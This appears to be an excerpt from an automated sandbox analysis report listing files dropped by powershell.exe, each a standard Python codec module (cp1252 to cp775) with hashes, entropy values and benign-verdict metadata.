                                                                                                                                                                                                                      SHA-512:77E7921F48C9A361A67BAE80B9EEC4790B8DF51E6AFF5C13704035A2A7F33316F119478AC526C2FDEBB9EF30C0D7898AEA878E3DBA65F386D6E2C67FE61845B4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1252',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13401
                                                                                                                                                                                                                      Entropy (8bit):4.649593364658793
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:EHhsuOTDvRPUrXPLouhIAs2+i/I+DCYdlRfA21XHHjfvK8uHZf:hTBuhIAlvRlNr1XO8Ax
                                                                                                                                                                                                                      MD5:E86052CD641A07AA72686984073AF47E
                                                                                                                                                                                                                      SHA1:D9CAA17B52A5F48087F587B2996388DA799955BF
                                                                                                                                                                                                                      SHA-256:E0B0AFBD19DB367C34C505F99A2FCCAFC6BAE3DFD4E316F86375179DCFC60A28
                                                                                                                                                                                                                      SHA-512:7F87B2577902646C394FCC2D7A5407B05E23AC3CD07E7749CEDC9898F3E357067729F586011862D9FC8604DB13D0921B060471C3A52B6C17A0F7C5694DDA7788
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1253 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1253.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1253',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13809
                                                                                                                                                                                                                      Entropy (8bit):4.577307574580316
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:OHhsuOTDvRiUrXPLouhIAs2+i/IfDCYuZt6B5TdjN:bTQuhIAlK6Zt69x
                                                                                                                                                                                                                      MD5:490756413A61FC0954EFA491244CD487
                                                                                                                                                                                                                      SHA1:849EC325801A2E2CC784A54590482593FF89A5A1
                                                                                                                                                                                                                      SHA-256:0986ACD9A25FE91C4720C912322253AD105AB951A2D0D364CF0E522E6E52C174
                                                                                                                                                                                                                      SHA-512:BCDC7CB6C94600D15F9A3BFA51BDC0D289C997AC40EC4DA1CB0D91B6BFE875968B6C2834FC03D306EE6A3D022955C1C3435864491AF8548E82ACC60E2A215601
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1254 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1254.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1254',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12773
                                                                                                                                                                                                                      Entropy (8bit):4.658204122531881
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:IHhsuOTDvRVUrXPLouhIAs2+i/IRDCYLSC51N7jG6ZZPHxvTh:VTTuhIAlQ3Sm7b
                                                                                                                                                                                                                      MD5:8B8E1CC22BEF6EDE6E44C4DD2A287FF6
                                                                                                                                                                                                                      SHA1:304930955DF0499CBFDF90BFD9BB9A01D0059B23
                                                                                                                                                                                                                      SHA-256:C039AD62EE73102915D989CF390F76896C335CA8DBCDD4CA27D5441F76E081BE
                                                                                                                                                                                                                      SHA-512:FA779A6E599816AAAA84C1FB715217DE2341399D47E70A440A06E312BA69780E14CB3014D048C7005F5A9025B3AB8D508DA052BFD678AD4E269F10CB1B35AE66
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1255 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1255.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1255',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13121
                                                                                                                                                                                                                      Entropy (8bit):4.623477051591162
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:2HhsuOTDvRgUrXPLouhIAs2+i75IiPEFPDCYljorsWCdxeiu5it2uncgYejC:TTiuhIAl4P6rsEr
                                                                                                                                                                                                                      MD5:2CCBF9B374CE98453955DAD9848C90FF
                                                                                                                                                                                                                      SHA1:0E7B99D406E72AF59F80405B9676988CD6881C40
                                                                                                                                                                                                                      SHA-256:24A69E11902CC4054280EC2DE38EE836D0BE22EABDB9CDC56D9A7B63C8CDDB06
                                                                                                                                                                                                                      SHA-512:4A97C524F951DE4CF08F2EF86F9AA9F4F421BA3327D07E0B883958057E6204A410F42E82E0C7DBBAC8F3252065F96A4255A820753BD6EBE80254E1AFE160FD3F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1256 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1256.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1256',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13681
                                                                                                                                                                                                                      Entropy (8bit):4.608029292102436
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:8HhsuOTDvRzUrXPLouhIAs2+icIkDCYwoe1X:pTluhIAlI0oet
                                                                                                                                                                                                                      MD5:544A8ACE12064E96C3E6A7DB436F9F09
                                                                                                                                                                                                                      SHA1:ADADE6DC415731BCC23386DF031CA5B003D09881
                                                                                                                                                                                                                      SHA-256:902262C0640FC0F21CF85A86456DC33D43E51B07E6C961526BF7F7ED4CE2AB8D
                                                                                                                                                                                                                      SHA-512:4830A946DA25CBECDD1AEB5DF055FD1961EF8E32936406889C39EE4F9ACD6A15605DCA448AA73DF0A4BE721BAB6B04C03D02524918FCBB1499C4E7B60863BCE2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1257 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1257.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1257',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13671
                                                                                                                                                                                                                      Entropy (8bit):4.591778820995035
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:2HhsuOTDvRmUrXPLouhIAs2+i/IZDCYAZtTBd0HXIGPf:TTEuhIAlIMZtlJS
                                                                                                                                                                                                                      MD5:11328D7E1CD433053C29BEC6C739FB67
                                                                                                                                                                                                                      SHA1:FD2D141516EEF65B903F552AC68CE30AE45A40A8
                                                                                                                                                                                                                      SHA-256:A9E1E891DD1F28DEA5ABB5819AEE1477156D288733EB2342F0696F1E5DD0A11D
                                                                                                                                                                                                                      SHA-512:E643AFFBC683B99169FDB236184E25DDAC58803FB11799BD56BE44376953DD16F5E4C982CDFCA8D8F79D0B142E294ABAB72F25202F012F4149371B20F408A3E0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp1258 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1258.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp1258',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14439
                                                                                                                                                                                                                      Entropy (8bit):4.5334908386243296
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:8HhsuOTDvR8Us0/nt7nw642d0C2UjoDyHg45tgVp3E5EmYI:pT1PtbcWoDumpU+mYI
                                                                                                                                                                                                                      MD5:CF85B6224C5FE7C8EA6CBAD1C1BB6155
                                                                                                                                                                                                                      SHA1:C8E3B07E4B5447EC58A280414228797EE6816A24
                                                                                                                                                                                                                      SHA-256:016C8DA778E50CBCF76815BBD8F6D0D33DBF1FAF852726D85A5A47651C371033
                                                                                                                                                                                                                      SHA-512:8FF744A4A173D2F046180A6A5C1A17715E7ADA582278166B2A418DE4C65441A47A040E8040E2385E02A24826082542D6CFBB3B548401ABEA8D0A17FEFD43B660
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp273 generated from 'python-mappings/CP273.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp273',.. encode=Codec().e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12362
                                                                                                                                                                                                                      Entropy (8bit):4.601902617990224
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:aHhsuOTDvRqUwGYPJHjA/KT4RltXARfFVV2IC4FcE8bVO4BG2QST/:3TBcWK3cE8bT1QK
                                                                                                                                                                                                                      MD5:85667B33899EC661331A9CA44CB36DEC
                                                                                                                                                                                                                      SHA1:E755BF3ACA17896638E62BE91D9C8AFE0A6ED725
                                                                                                                                                                                                                      SHA-256:AE6E956B42CF3AE32E988833772FC040F8393DA007048AD2B4E1D621FE6523E7
                                                                                                                                                                                                                      SHA-512:4D7178C9AC351A644F6062D09FA9C28D569F48ABF1CC4F906C93B8BCCB151FE450E0A9B7A8EF26BD2851A7CE213F27A309F0EA6A2C999A7C5866432DF9E6FBCB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp424 generated from 'MAPPINGS/VENDORS/MISC/CP424.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp424',.. encode=Cod
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35262
                                                                                                                                                                                                                      Entropy (8bit):4.591583826618043
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:p1LnZkjh4wVdjIVjxAEJHWJn4AVEccqPMy:XqjhJVRKxAEJ2BF6S
                                                                                                                                                                                                                      MD5:A11E9C869BD055D6C91354FFFEB7644F
                                                                                                                                                                                                                      SHA1:B008E64C808A86312863C194C621214134B4C432
                                                                                                                                                                                                                      SHA-256:7B0A9AE2E74D370354CC60CBCFB77AF970364818BE2E2A446187DCCCF9E28ACC
                                                                                                                                                                                                                      SHA-512:3A628F1BB8D36845074B4FA66A8B91B5F8365C5677CC81AFA5D7DA1313F328E1B409A3C43249C9D62FADC2B71CE9E7CE70CCD3854BA7B8CBB19CFB79B8AD92FE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp437 generated from 'VENDORS/MICSFT/PC/CP437.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp437',.. encode=Codec().enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13428
                                                                                                                                                                                                                      Entropy (8bit):4.523115396759222
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:ZHhsuOTDvR7UZkPS9BrG4/RVFIhRNvYkV2H2QB:8TirG4/0RYkgWQB
                                                                                                                                                                                                                      MD5:BEE7333323D2BCA3262F13C59414EDD3
                                                                                                                                                                                                                      SHA1:57E74B1BA865C5198C26344B2F6F270350C014B4
                                                                                                                                                                                                                      SHA-256:A5CAC573ED357CB6C2A672D01696212C25E306936586D94BE0D0130354A4DB6F
                                                                                                                                                                                                                      SHA-512:B9DD5137040DC57308093D9C71291668CE7CBEDCA11DBC0D85187C6DEE568CA25F69B67F7FB08A2CA248D966EC622C7CE0DD35C0BA2CD77C860274A11A50827D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp500 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP500.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp500',.. e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13995
                                                                                                                                                                                                                      Entropy (8bit):4.642939154809849
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:fhsuOTDvRD9lPEeXGyQCmEdfn4OH3NGzN7KwAKYWEDdunzT:STSeXGy1dc5
                                                                                                                                                                                                                      MD5:9B7E8AB7C2EE4F82BE09E14F3D3AEA4C
                                                                                                                                                                                                                      SHA1:AA76BF3210EF70474330E0212A8B2EDEB518DC5B
                                                                                                                                                                                                                      SHA-256:016BDB7208A0D6BFAF8972C1F6BB4B3DE39C77E026B49ED106866D592BE4810B
                                                                                                                                                                                                                      SHA-512:0E706CB3E9199663D2DE2E6443F2C9E46279F11ED32BFFE482C4262D7CBD1A30F49018588F96C037E147D9DCE27F29C4ABC1EAAD230CF09B73317F5872967CCD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Python Character Mapping Codec cp720 generated on Windows:..Vista 6.0.6002 SP2 Multiprocessor Free with the command:.. python Tools/unicode/genwincodec.py 720.."""#"......import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codec
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35379
                                                                                                                                                                                                                      Entropy (8bit):4.616163070442315
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:VmDXpX8Jytkjh4wVoEm3clxHRE8q6HWJn4AVhUise69/TUMy:8DXizjhJVoEm3clx6y2BFH25W
                                                                                                                                                                                                                      MD5:BD60E98CC59C8BD60874F59A06E30F78
                                                                                                                                                                                                                      SHA1:D0086209BA6B3D56964EA7295A8EA54BC5AA02D7
                                                                                                                                                                                                                      SHA-256:F2DA9D418B2364C2E1A587B7A6E26FF5601C16AA7993070F2C955DDF2A1F860D
                                                                                                                                                                                                                      SHA-512:377D0F87DDBB23D9CCAABE35085EF1E92FCE766B01E55774F4371EA281A03825D141A6F905C90C419B19D09529A8185827C9F4FC6EB176BBADE3DFB478AFB1A0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp737',.. encode=Codec().enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35173
                                                                                                                                                                                                                      Entropy (8bit):4.550355257462109
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:8HLsuYDvRxp2YM0AQ7COJgJOlSwrE0PXRN/h4wcuSMy+PeD3xUpWS2449jBRWJnI:lRNALMSkjh4wVHeahcHWJn4AVztzXsj5
                                                                                                                                                                                                                      MD5:CBEF285952C0476BF35BFCD7E7818919
                                                                                                                                                                                                                      SHA1:1C61953A3AE6638EE415CA2A93710FF3D8E59D68
                                                                                                                                                                                                                      SHA-256:00F2A5E71CA98ED656EC430A80FC2E971988A0A33EBDEA77661BDBE24FE2FBFF
                                                                                                                                                                                                                      SHA-512:2F78E73843365DB7F164C2F3C7CD2AE5860D80A11BAF9212BA54C58F9B08C99035FEF6A200D836036AF2B4F1F286B0C2447953203B0EB1C87FD5F1DBE3D24396
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp775 generated from 'VENDORS/MICSFT/PC/CP775.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp775',.. encode=Codec().enc
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34803
                                                                                                                                                                                                                      Entropy (8bit):4.521332806052938
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QHLsuYDvRVSUpAJZjJBfX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxspGf6w6F44j:hbAZSkjh4wV5j9eJTHWJn4AVgqur
                                                                                                                                                                                                                      MD5:F5F11DA44C65B2A394A4137E36E35E82
                                                                                                                                                                                                                      SHA1:BD17C2F9156D704AEAB144A4C1B5B8CA436A5D73
                                                                                                                                                                                                                      SHA-256:DCBE5938D7FE65072D4A286A184046DB211544C30F0C3C370B9CD594CF3B36BD
                                                                                                                                                                                                                      SHA-512:58AE94059D5ABDC1892FE28DA1646249A0A96817B790BA468B1AA11983A8292AB1FCD1357C9EF9771DE11685FC999791DB184CAF16E7E05D634680AF8A74D6BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
